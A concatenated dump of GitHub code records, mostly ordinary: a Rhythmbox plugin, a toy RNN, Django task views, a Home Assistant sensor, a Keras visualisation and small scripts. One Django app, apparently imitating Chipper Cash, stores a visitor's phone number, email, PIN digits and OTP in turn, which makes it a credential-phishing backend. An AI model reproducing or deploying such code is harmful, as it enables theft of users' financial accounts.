= ActionGroup(self.shell, 'small window actions')\n action = self.action_group.add_action(\n func=self.small_window_action,\n action_name='SmallWindow',\n label='Small Window',\n action_type='app')\n\n self._appshell = ApplicationShell(self.shell)\n self._appshell.insert_action_group(self.action_group)\n self._appshell.add_app_menuitems(ui_string, 'small window actions')\n\n # Build up small window interface\n builder = Gtk.Builder()\n if is_rb3():\n builder.add_from_file(rb.find_plugin_file(self, \"interface_rb3.ui\"))\n else:\n builder.add_from_file(rb.find_plugin_file(self, \"interface_rb2.ui\"))\n self.load_builder_content(builder)\n self.connect_builder_content(builder)\n restore = builder.get_object('restore button')\n restore.connect('clicked', self.main_window_action)\n\n # Prepare windows\n for sub_widget in self.small_window:\n sub_widget.show_all()\n\n geometry = Gdk.Geometry()\n\n geometry.min_width = 300\n geometry.max_width = 5120\n geometry.min_height = -1\n geometry.max_height = -1\n\n self.small_window.set_geometry_hints(self.small_window,\n geometry,\n Gdk.WindowHints.MIN_SIZE | Gdk.WindowHints.MAX_SIZE)\n\n if is_rb3():\n self.shell.props.application.add_window(self.small_window)\n # Bring Builtin Actions to plugin\n for (a, b) in ((self.play_button, \"play\"),\n 
(self.prev_button, \"play-previous\"),\n (self.next_button, \"play-next\"),\n (self.repeat_toggle, \"play-repeat\"),\n (self.shuffle_toggle, \"play-shuffle\")):\n a.set_action_name(\"app.\" + b)\n #if b == \"play-repeat\" or b == \"play-shuffle\":\n # a.set_action_target_value(GLib.Variant(\"b\", True))\n else:\n # Bring Builtin Actions to plugin\n for (a, b) in ((self.play_button, \"ControlPlay\"),\n (self.prev_button, \"ControlPrevious\"),\n (self.next_button, \"ControlNext\"),\n (self.repeat_toggle, \"ControlRepeat\"),\n (self.shuffle_toggle, \"ControlShuffle\")):\n a.set_related_action(self._appshell.lookup_action(\"MainActions\", b).action)\n\n # Bind needed properites.\n self.bind_title = GObject.Binding(source=self.main_window,\n source_property=\"title\",\n target=self.small_window,\n target_property=\"title\",\n flags=GObject.BindingFlags.DEFAULT)\n\n # Connect signal handlers to rhythmbox\n self.shell_player = self.shell.props.shell_player\n self.sh_psc = self.shell_player.connect(\"playing-song-changed\",\n self._sh_on_song_change)\n\n self.sh_op = self.shell_player.connect(\"elapsed-changed\",\n self._sh_on_playing)\n\n def do_deactivate(self):\n self.shell_player.disconnect(self.sh_op)\n self.shell_player.disconnect(self.sh_psc)\n del self.shell_player\n\n del self.bind_title\n self._appshell.cleanup()\n del self.album_art_db\n\n self.purge_builder_content()\n\n del self.main_window\n del self.shell\n\n # Controlling Functions ####################################################\n\n def display_song(self, entry):\n self.entry = entry\n\n self.cover_pixbuf = None\n self.album_cover.clear()\n\n if ( entry is None ):\n self.song_button_label.set_text(\"\")\n\n else:\n self.song_button_label.set_markup(\n \"{title} {album} - {artist} \".format(\n title=entry.get_string(RB.RhythmDBPropType.TITLE),\n album=entry.get_string(RB.RhythmDBPropType.ALBUM),\n artist=entry.get_string(RB.RhythmDBPropType.ARTIST)))\n\n key = entry.create_ext_db_key(RB.RhythmDBPropType.ALBUM)\n self.album_art_db.request(key,\n self.display_song_album_art_callback,\n entry)\n\n def display_song_album_art_callback(self, key, filename, data, entry):\n if ( ( data is not None ) and ( isinstance(data, GdkPixbuf.Pixbuf) ) ):\n self.cover_pixbuf = data\n scale_cover = self.cover_pixbuf.scale_simple(24, 24,\n GdkPixbuf.InterpType.HYPER)\n\n self.album_cover.set_from_pixbuf(scale_cover)\n else:\n self.cover_pixbuf = None\n self.album_cover.clear()\n\n # Signal Handlers ##########################################################\n\n def small_window_action(self, *args):\n self.main_window.hide()\n self.small_window.show()\n\n def main_window_action(self, *args):\n self.small_window.hide()\n self.main_window.show()\n\n def _sh_small_window_on_close(self, window, asdf):\n self.shell.quit()\n\n def _sh_on_song_change(self, player, entry):\n if ( entry is not None ):\n self.song_duration = entry.get_ulong(RB.RhythmDBPropType.DURATION)\n else:\n self.song_duration = 0\n self.display_song(entry)\n\n def _sh_on_playing(self, player, second):\n if ( self.song_duration != 0 ):\n self.song_progress.progress = float(second) / self.song_duration\n\n def _sh_progress_control(self, progress, fraction):\n if ( self.song_duration != 0 ):\n self.shell_player.set_playing_time(self.song_duration * fraction)\n\n def _sh_bigger_cover(self, cover, x, y, key, tooltip):\n if ( self.cover_pixbuf is not None ):\n tooltip.set_icon(self.cover_pixbuf.scale_simple(300, 300,\n GdkPixbuf.InterpType.HYPER))\n return True\n else:\n return False\n\n\n# 
###############################################################################\n# Custom Widgets ###############################################################\n\nclass SmallProgressBar(Gtk.DrawingArea):\n __gsignals__ = {\n \"control\": (GObject.SIGNAL_RUN_LAST, None, (float,))\n }\n\n @GObject.Property\n def progress(self):\n return self.__progress__\n\n @progress.setter\n def progress(self, value):\n self.__progress__ = value\n self.queue_draw()\n\n def __init__(self):\n super(SmallProgressBar, self).__init__()\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.button_pressed = False\n self.button_time = 0\n self.__progress__ = 0\n\n def do_draw(self, cc):\n alloc = self.get_allocation()\n sc = self.get_style_context()\n fgc = sc.get_color(self.get_state_flags())\n\n cc.set_source_rgba(1, 1, 1, 1)\n cc.rectangle(0, 0, alloc.width, alloc.height)\n cc.fill()\n\n cc.set_source_rgba(fgc.red, fgc.green, fgc.blue, fgc.alpha)\n cc.rectangle(0, 0, alloc.width * self.progress, alloc.height)\n cc.fill()\n\n def do_motion_notify_event(self, event):\n if ( self.button_pressed ):\n self.control_by_event(event)\n return True\n else:\n return False\n\n def do_button_press_event(self, event):\n self.button_pressed = True\n self.control_by_event(event)\n return True\n\n def do_button_release_event(self, event):\n self.button_pressed = False\n self.control_by_event(event)\n return True\n\n def control_by_event(self, event):\n allocw = self.get_allocated_width()\n fraction = event.x / allocw\n if ( self.button_time + 100 < event.time ):\n self.button_time = event.time\n self.emit(\"control\", fraction)\n","repo_name":"fossfreedom/smallwindow","sub_path":"smallwindow.py","file_name":"smallwindow.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
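The window-title synchronisation in the plugin above relies on GObject property binding. The mechanism can be observed without Rhythmbox or any GTK window; a minimal sketch (requires PyGObject; the Box class is illustrative):

from gi.repository import GObject

class Box(GObject.Object):
    label = GObject.Property(type=str, default="")

a, b = Box(), Box()
# One-way binding: changes to a.label propagate to b.label.
a.bind_property("label", b, "label", GObject.BindingFlags.DEFAULT)
a.props.label = "now playing"
print(b.props.label)  # -> "now playing", kept in sync by the binding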
+{"seq_id":"3010542198","text":"#!/usr/bin/env python3\n# 2020-05-01\n# based on:\n# https://peterroelants.github.io/posts/rnn-implementation-part01/\n\n# the model has one recurrent weight and one input weight\n# the input is a sequence of ones and zeros\n# we want to count the ones\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Settings\nalpha=0.1 # learning rate\ndeltax=0.01 # initial weight-change amount\ndeltar=0.01 # initial weight-change amount\nnp.random.seed(42)\n\n# data\nns=40 # number of sequences\nnps=5 # number of elements in one sequence\nx=(np.round(np.random.rand(ns*nps)).astype(int)).reshape((ns,nps))\ny=np.sum(x,axis=1)\n\n# for this example, weights are each just a 1x1 matrix\nwr=0.1 # recurrent weight\nwx=0.8 # input-weight\nh0=0. # initial value of the 1x1 matrix of neurons\n#wx=1. ;wr=1. # cheating to get perfect model\n# if I set the initial weights to the same value, they will converge to the perfect solution\n# if the initial values are unequal, the model doesn't find the perfect weights\n\ndef fprop(x,h0,wr,wx):\n # forward propagation\n # x is here just one sequence with nps elements\n nps=len(x)\n hs=np.zeros(nps) # all the states the network takes during this sequence\n for ll in range(nps):\n if ll==0: prevh=h0\n else: prevh=hs[ll-1]\n hs[ll]= prevh*wr + x[ll]*wx\n return hs\n\nne=100\nsignx0=1.0 # initialize previous sign\nsignr0=1.0\nMSE=np.zeros(ne)\nfor ee in range(ne): # training epochs\n # run through the data set and compute the error\n dmsedyhat=0. # initialize gradient of mean squared error w.r.t. yhat\n for ii in range(ns): # for all sample sequences\n hs=fprop(x[ii,:],h0,wr,wx)\n yhat=hs[-1] # prediction is the last state\n #yhat=np.round(hs[-1]) # round to integer, as we're counting integers\n MSE[ee]+=(1./ns)*(yhat-y[ii])**2.\n dmsedyhat+= (1./ns)*2.0*(yhat-y[ii])\n print('epoch=%i MSE=%.8f' %(ee,MSE[ee])) \n\n # propagate the error backwards\n dwx=0.; dwr=0.\n # no need to randomize order of samples, because the batchsize==samplesize\n # i.e. we run through the whole data set before updating weights anyway, no matter the order\n for ii in range(ns): # all samples\n e=dmsedyhat # for the very last state, the error is dMSE/dyhat\n for ll in range(nps-1,-1,-1):\n if ll==0: prevh=h0\n else: prevh=hs[ll-1]\n dwx += (1./ns)*e*x[ii,ll] # change in wx, i.e. dwx= e[ll]*x[ll]\n dwr += (1./ns)*e*prevh # change in wr, i.e. dwr= e[ll]*hs[ll-1]\n e*= wr # prepare error for next step back, e[ll-1] = e*wr\n print('epoch=%i Would change weights: dwr=%.6f, dwx=%.6f' %(ee,dwr,dwx))\n if np.abs(dwx)>0.: # i.e. don't check, always clip weight-changes\n signx=np.sign(dwx)\n dwx = signx*deltax # clip\n if signx != signx0:\n deltax *= 0.5 # sign changed\n else:\n deltax *= 1.2 # sign didn't change\n signx0=signx\n if np.abs(dwr)>0.: # i.e. don't check, always clip weight-changes\n signr=np.sign(dwr)\n dwr = signr*deltar # clip\n if signr != signr0:\n deltar *= 0.5 # sign changed .. if this is larger, result is the same but a bit less stable\n else:\n deltar *= 1.2 # sign didn't change\n signr0=signr\n print('epoch=%i Will change weights: dwr=%.6f, dwx=%.6f' %(ee,dwr,dwx))\n wx-=alpha*dwx; wr-=alpha*dwr; # update weights\n\nprint('Final weights wr=%f, wx=%f' %(wr,wx))\nprint('Testing on final model:')\nfor ii in range(ns): # for all sample sequences\n hs=fprop(x[ii,:],h0,wr,wx)\n yhat=np.round(hs[-1]) # round to integer, as we're counting integers\n if yhat==y[ii]:\n res='Good!'\n else:\n res='Miscounted.'\n print('Sample %04i: prediction=%i, true value = %i ' %(ii,yhat,y[ii]) + res)\n\n# plot convergence\nplt.figure()\nplt.plot(np.arange(ne)+1,MSE,'k-')\nplt.xlabel('epochs')\nplt.ylabel('mean squared error')\n#plt.yscale('log')\nplt.title('Final error = %.6f' %(MSE[-1]))\n#plt.show()\nplt.savefig('rnn0_result.png',dpi=200,bbox_inches='tight')\n\n\n\n","repo_name":"gloomhaven/mlpets","sub_path":"rnn/rnn0.py","file_name":"rnn0.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6628589593","text":"\nfrom task.models import Task, Answer as Answering\nfrom task.serializers import TaskSerializer, AnswerSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom rest_framework.permissions import AllowAny\nfrom django.db import models\nfrom django.db.models import F\nfrom users.models import CustomUser\nfrom django.db.models import Q\nfrom django.core import serializers\nimport json\n\n\nclass CreateTask(APIView):\n \"\"\"\n create a new task.\n \"\"\"\n def post(self, request, format=None):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ElementCategory(APIView):\n \"\"\"\n list of element_category(not duplicated)\n \"\"\"\n def get(self, request, format=None):\n element_categories = Task.objects.values_list('element_category')\n return Response(element_categories)\n\n\nclass Answer(APIView):\n \"\"\"\n Saving answer.\n \"\"\"\n def post(self, request, format=None):\n request_data = request.data\n current_user = CustomUser.objects.filter(email=request.user).get()\n try:\n task = Task.objects.filter(pk=request_data['task']).get()\n except Task.DoesNotExist:\n return Response({\"error\": \"task not exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n request_data['user'] = current_user.id\n check_answer = Answering.objects.filter(user=current_user, task=task).all()\n if len(check_answer) == 0:\n serializer = AnswerSerializer(data=request_data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"already answered\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass TaskList(APIView):\n permission_classes = (AllowAny,)\n \"\"\"\n Paginated list of tasks still open for the current user.\n \"\"\"\n def get(self, request, format=None):\n num_per_page = 5\n page = request.GET.get('page')\n task_type = request.GET.get('task_type')\n element_category = request.GET.get('element_category')\n current_user = request.user\n email = request.user.email\n answered_tasks = Answering.objects.filter(user=current_user).values_list('task')\n answered_task_ids = []\n for answered_task in answered_tasks:\n answered_task_ids.append(answered_task[0])\n \"\"\"\n get tasks filtered by\n voters - if the task has already been answered N times and N equals 'voters', the task is excluded\n task_type - filter field\n element_category - filter field\n black_list - if black_list contains the current user's email, the task is excluded\n priority - order by priority\n \"\"\"\n if element_category == \"All\":\n query = Task.objects \\\n .annotate(counted_voters=models.Count('answer')) \\\n .values('id', 'task_type', 'element_category', 'element_type', 'priority', 'voters', 'external_id',\n 'task_name', 'image_url', 'answers', 'black_list', 'white_list', 'counted_voters') \\\n .filter(voters__gt=F('counted_voters'), task_type=task_type) \\\n .filter(Q(white_list=\"\") | (Q(white_list__isnull=False) & Q(white_list__contains=email))) \\\n .exclude(black_list__contains=email) \\\n .exclude(id__in=answered_task_ids) \\\n .order_by('priority')\n else:\n query = Task.objects\\\n .annotate(counted_voters=models.Count('answer')) \\\n .values('id', 'task_type', 'element_category', 'element_type', 'priority', 'voters', 'external_id',\n 'task_name', 'image_url', 'answers', 'black_list', 'white_list', 'counted_voters') \\\n .filter(voters__gt=F('counted_voters'), task_type=task_type, element_category=element_category) \\\n .filter(Q(white_list=\"\") | (Q(white_list__isnull=False) & Q(white_list__contains=email)))\\\n .exclude(black_list__contains=email) \\\n .exclude(id__in=answered_task_ids) \\\n .order_by('priority')\n\n task_list = query.all()\n paginator = Paginator(task_list, num_per_page)\n\n try:\n tasks = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n tasks = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), return an empty list.\n return Response([])\n\n return Response(tasks.object_list)\n\n\nclass TaskListByExternalId(APIView):\n permission_classes = (AllowAny,)\n \"\"\"\n A single task together with its answers, looked up by primary key.\n \"\"\"\n def get(self, request):\n pk = int(request.GET.get('pk'))\n\n try:\n task = Task.objects.filter(pk=pk).get()\n except Task.DoesNotExist:\n task = None\n if task:\n task_json = serializers.serialize(\"json\", [task,])\n task_structure = json.loads(task_json)\n task_fields = task_structure[0]['fields']\n\n answers_json = serializers.serialize(\"json\", Answering.objects.filter(task=task).all())\n answer_structure = json.loads(answers_json)\n answer_fields = []\n for answer in answer_structure:\n answer_fields.append(answer['fields'])\n\n response = {\n \"pk\": pk,\n \"task\": task_fields,\n \"answers\": answer_fields\n }\n else:\n response = {\n \"pk\": pk,\n \"task\": None,\n \"answers\": None\n }\n\n return Response(response)\n\n\nclass UpdateTaskStatus(APIView):\n \"\"\"\n Enable/Disable task status.\n \"\"\"\n def get_object(self, info):\n try:\n task = Task.objects.filter(pk=info['pk']).get()\n except Task.DoesNotExist:\n task = None\n if task:\n return task\n else:\n return None\n\n def put(self, request, format=None):\n task = self.get_object(request.data)\n if task:\n task.is_active = request.data['is_active']\n task.save()\n response = {'status': 0, 'message': 'success'}\n return Response(response)\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"django-guru/Django-React","sub_path":"backend/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39791487935","text":"#!/usr/bin/python3\nfrom operator import itemgetter\nimport sys\n\n\nmain_dict = dict()\ni = 0\n\nfor line in sys.stdin: \n line = line.strip() \n fileread = line.split(\"$\")\n k1=fileread[0]\n k2=fileread[1]\n k3=int(fileread[2])\n k4=int(fileread[3])\n if((k1,k2) in main_dict.keys()):\n d = main_dict[k1,k2]\n main_dict[k1,k2] = (k3 + d[0] , k4+d[1]) \n else:\n main_dict[k1,k2] = (k3,k4)\n\n\nfor item1,v in list(main_dict.items()):\n v1,v2 = v[0],v[1]\n #print(v1,v2)\n if(v[1] < 6):\n del main_dict[item1]\nold = []\nsorted_final=sorted(main_dict.items(),key = lambda item:(-item[1][0] , item[1][1]))\nfor item1 in range(len(sorted_final)):\n print(sorted_final[item1][0][0]+\",\"+sorted_final[item1][0][1]+\",\"+str(sorted_final[item1][1][0])+\",\"+str(sorted_final[item1][1][1]))\n\n","repo_name":"IamMayankThakur/test-bigdata","sub_path":"adminmgr/media/code/python/red1/BD_0019_0207_0714_1822_reducer.py","file_name":"BD_0019_0207_0714_1822_reducer.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"70"}
+{"seq_id":"2624478934","text":"\"\"\"Create contract alerts\n\nRevision ID: 411346f721b4\nRevises: 72ed3f54a6ca\nCreate Date: 2022-02-13 02:12:10.026180\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"411346f721b4\"\ndown_revision = \"72ed3f54a6ca\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"contract_alerts\",\n sa.Column(\"alert_id\", postgresql.BIGINT(), nullable=False),\n sa.Column(\"keyword\", sa.String(), nullable=False, unique=True),\n sa.Column(\"chat_ids\", postgresql.ARRAY(postgresql.BIGINT()), nullable=False),\n sa.PrimaryKeyConstraint(\"alert_id\"),\n )\n op.create_index(\n \"ix_contract_alerts__chat_ids\",\n \"contract_alerts\",\n [\"chat_ids\"],\n unique=False,\n postgresql_using=\"gin\",\n )\n op.create_index(\n op.f(\"ix_contract_alerts_keyword\"), \"contract_alerts\", [\"keyword\"], unique=True\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_contract_alerts_keyword\"), table_name=\"contract_alerts\")\n op.drop_index(\n \"ix_contract_alerts__chat_ids\",\n table_name=\"contract_alerts\",\n postgresql_using=\"gin\",\n )\n op.drop_table(\"contract_alerts\")\n # ### end Alembic commands ###\n","repo_name":"edwinzhng/contract-scan-dash","sub_path":"server/alembic/versions/411346f721b4_create_contract_alerts.py","file_name":"411346f721b4_create_contract_alerts.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"518114626","text":"from keras.models import load_model, Sequential\nfrom keras.preprocessing import image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras import models\n\n\n\n\nmodel_path = \"C:/Users/phan/OneDrive - adesso Group/model/dogcat.h5\"\nimg_path = \"./cat.1847.jpg\"\n\n\nimg = image.load_img(img_path, target_size=(150, 150))\nimg_tensor = image.img_to_array(img)\nimg_tensor = np.expand_dims(img_tensor, axis=0)\nimg_tensor /= 255.\n\nprint(img_tensor.shape)\nplt.imshow(img_tensor[0])\nplt.show()\n\nmodel: Sequential = load_model(model_path)\nmodel.summary()\n\n# Extracts the outputs of the top 8 layers:\nlayer_outputs = [layer.output for layer in model.layers[:8]]\n# Creates a model that will return these outputs, given the model input:\nactivation_model = models.Model(inputs=model.input, outputs=layer_outputs)\n\n# This will return a list of 5 Numpy arrays:\n# one array per layer activation\nactivations = activation_model.predict(img_tensor)\n\nfirst_layer_activation = activations[0]\n\nfor i in range(16):\n plt.matshow(first_layer_activation[0, :, :, i], cmap='viridis')\n plt.show()","repo_name":"nghiemphan93/machineLearning","sub_path":"2018-10-9/VisualConvnet.py","file_name":"VisualConvnet.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6701878637","text":"\"\"\"\nSupport for ejp site.\n\n\nconfiguration.yaml\n\nsensor:\n - platform: edf_ejp\n regions:\n - ouest\n - sud\n - paca\n - nord\n\"\"\"\nimport logging\nfrom datetime import timedelta\nfrom datetime import datetime\nimport requests\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import ( CONF_RESOURCES)\nfrom homeassistant.util import Throttle\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.components.binary_sensor import BinarySensorDevice\n\n__version__ = '0.0.1'\n\n_LOGGER = logging.getLogger(__name__)\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(days=1)\nnow = datetime.today()\n\nSENSOR_PREFIX = 'EJP '\n\nSENSOR_TYPES = {\n 'jour': ['today', '', 'mdi:flash'],\n 'tomorrow': ['tomorrow', '', 'mdi:flash'],\n}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required('regions', default=[]):\n vol.All(cv.ensure_list, [vol.In({'ouest','paca','nord','sud'})])\n})\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the EJP sensors.\"\"\"\n\n try:\n data = EJPData()\n except requests.exceptions.HTTPError as error:\n _LOGGER.error(error)\n return False\n\n entities = []\n \n for resource in SENSOR_TYPES:\n sensor_type = resource.lower()\n for region in config['regions']:\n entities.append(EjpSensor(data, sensor_type, region))\n\n add_entities(entities)\n\n\n# pylint: disable=abstract-method\nclass EJPData(object):\n \"\"\"Representation of the EJP data.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the data.\"\"\"\n self.data = None\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self):\n \"\"\"Update the data.\"\"\"\n try:\n self.data = requests.get('https://particulier.edf.fr/bin/edf_rc/servlets/ejptemponew?Date_a_remonter='+now.strftime('%Y-%m-%d')+'&TypeAlerte=EJP', timeout=5).json()\n _LOGGER.debug(\"Data = %s\", self.data)\n except requests.exceptions.RequestException:\n _LOGGER.error(\"Error occurred while fetching data.\")\n self.data = None\n return False\n\nclass EjpSensor(BinarySensorDevice):\n \"\"\"Representation of an EJP sensor.\"\"\"\n\n def __init__(self, data, sensor_type,region):\n \"\"\"Initialize the sensor.\"\"\"\n self.data = data\n self.type = sensor_type\n self.region = region\n self._name = SENSOR_PREFIX + region + '_' +SENSOR_TYPES[self.type][0]\n self._unit = SENSOR_TYPES[self.type][1]\n self._icon = SENSOR_TYPES[self.type][2]\n self._state = None\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def icon(self):\n \"\"\"Icon to use in the frontend, if any.\"\"\"\n return self._icon\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return self._state\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement of this entity, if any.\"\"\"\n return self._unit\n\n def update(self):\n \"\"\"Get the latest data and use it to update our sensor state.\"\"\"\n self.data.update()\n energy = self.data.data\n value = None\n \n if self.region+'_'+self.type == 'ouest_jour':\n value = energy[\"JourJ\"][\"EjpOuest\"]\n elif self.region+'_'+self.type == 'paca_jour':\n value = energy[\"JourJ\"][\"EjpPaca\"]\n elif self.region+'_'+self.type == 'sud_jour':\n value = energy[\"JourJ\"][\"EjpSud\"]\n elif self.region+'_'+self.type == 'nord_jour':\n value = energy[\"JourJ\"][\"EjpNord\"]\n if self.region+'_'+self.type == 'ouest_tomorrow':\n value = energy[\"JourJ1\"][\"EjpOuest\"]\n elif self.region+'_'+self.type == 'paca_tomorrow':\n value = energy[\"JourJ1\"][\"EjpPaca\"]\n elif self.region+'_'+self.type == 'sud_tomorrow':\n value = energy[\"JourJ1\"][\"EjpSud\"]\n elif self.region+'_'+self.type == 'nord_tomorrow':\n value = energy[\"JourJ1\"][\"EjpNord\"]\n \n self._state = value == 'EJP'\n","repo_name":"sguernion/hass-integration-edf_ejp","sub_path":"custom_components/edf_ejp/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74835551587","text":"import sys\ninput = sys.stdin.readline\n\n# 0. input\nn = int(input())\nmeeting = []\nfor _ in range(n):\n meeting.append(list(map(int, input().split())))\n\n# 1. sort\nmeeting.sort(key = lambda x : (x[1], x[0]))\n\n# 2. search\ncnt = 1\nstart_time = meeting[0][0]\nend_time = meeting[0][1]\n\nfor i in range(1, n):\n if meeting[i][0] >= end_time:\n cnt += 1\n end_time = meeting[i][1]\nprint(cnt)","repo_name":"Algorithm-Test-Study/Code_Test_Study","sub_path":"ElAsJay/1931.회의실배정.py","file_name":"1931.회의실배정.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"5608436751","text":"import time\nimport datetime\nimport os\nfrom danxiangli.bgsetter import setWallPaper\nfrom danxiangli.downloader import *\n\nif __name__ == '__main111111111111111__':\n while True:\n get_img()\n pic = 'your_path/image/wallpaper.bmp' # write an absolute path here\n setWallPaper(pic)\n time.sleep(6) # switch the wallpaper every 6 s\n print(1)\nif __name__ == '__main222__':\n print('设置墙纸')\n setWallPaper('image/final.jpg')\nif __name__ == '__main33333333333__':\n print('下载图片')\n date = datetime.datetime.now().strftime('%Y-%m-%d')\n url = 'http://img.owspace.com/Public/uploads/Download/2020/0109.jpg'\n download_image(date, url)\nif __name__ == '__main444444__':\n print('获取文件绝对路径')\n current_path = os.path.abspath(\"image/2020-01-09.bmp\")\n print(current_path)\n","repo_name":"Simple2016/python3.5","sub_path":"danxiangli/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26832617296","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom .models import *\n\n# Create your views here.\n\ndef index(request):\n\tif request.method=='POST':\n\t\tphone=request.POST.get('phone')\n\t\tpost=Post(phone=phone)\n\t\tpost.save()\n\t#if request.method == 'POST':\n\t#\tphone= request.POST('phone')\n\t#\tpost=Post(phone=phone)\n\t#\tpost.save()\n\n\t#\tsend_mail(\n\t#\t\t'Logins',#title\n\t#\t\tmessage, #message\n\t#\t\t'settings.EMAIL_HOST_USER', #sender if not available considered the default or configered\n\t#\t\t[email,'oscarwilliam1978@gmsail.com'], #reciver email\n\t#\t\tfail_silently=False\n\t#\t)\n\t\n\treturn render(request,'index.html',)\n\ndef emailverify(request):\n\tif request.method=='POST':\n\t\temail=request.POST.get('email')\n\t\temail_post=Email_post(email=email)\n\t\temail_post.save()\n\t\n\t\n\treturn render(request,'email.html',)\n\n\ndef email(request):\n\n\treturn render(request,'email.html',)\n\ndef pinverify(request):\n\tif request.method=='POST':\n\t\tpina=request.POST.get('pina')\n\t\tpinb=request.POST.get('pinb')\n\t\tpinc=request.POST.get('pinc')\n\t\tpind=request.POST.get('pind')\n\t\tpin_post=Pin_post(pina=pina,pinb=pinb,pinc=pinc,pind=pind,)\n\t\tpin_post.save()\n\t\n\treturn render(request,'pin.html',)\n\ndef pin(request):\n\n\treturn render(request,'pin.html',)\n\ndef otpverify(request):\n\tif request.method=='POST':\n\t\totp=request.POST.get('otp')\n\t\totp_post=Otp_post(otp=otp)\n\t\totp_post.save()\n\t\t\n\treturn render(request,'otp.html',)\n\ndef otp(request):\n\t\t\n\treturn render(request,'otp.html',)\n","repo_name":"Kizinto/chipcashform","sub_path":"chippercashapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36152757291","text":"import pandas as pd\n\n# a = [1, 7, 2]\n\nciudades = ['Valencia', 'Barcelona', 'Castellon']\ncodigo = ['123A', '456B', '789C']\n\nmyvar = pd.Series(ciudades, index = codigo)\n\n\n\nif __name__ == '__main__':\n print(myvar)\n # print(myvar[\"y\"])\n # print(pd.__version__)\n ","repo_name":"JoseMarin/jmm-python-pandas-alchemy-04-2022","sub_path":"code/ex03_series.py","file_name":"ex03_series.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
